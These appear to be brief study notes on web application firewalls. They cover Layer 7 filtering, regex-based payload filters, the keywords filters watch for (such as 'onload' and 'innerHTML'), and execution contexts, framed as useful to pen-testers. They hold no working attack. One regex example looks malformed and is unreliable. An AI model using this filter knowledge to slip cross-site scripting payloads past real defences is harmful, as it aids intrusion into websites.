Web application firewall are:
- Generally Layer 7
- Security-usability tradeoff
More about:
- Mostly useful for pen-tester.
- Mostly the companies uses the firewalls of some specific companies.
They usually use the Regex to filter out payloads.
Common/General Filters:
- Function calls
‘*/(.**)/’
- Keywords like
‘onload’, ‘location’,
’innerHTML’
- Array index operations (in some contexts)
’a[b][c]’
Execution Contexts:
Where is the payload running?
- In a string, HTML element, JS code
- Helps reduce false positives
- Requires WAF to be context aware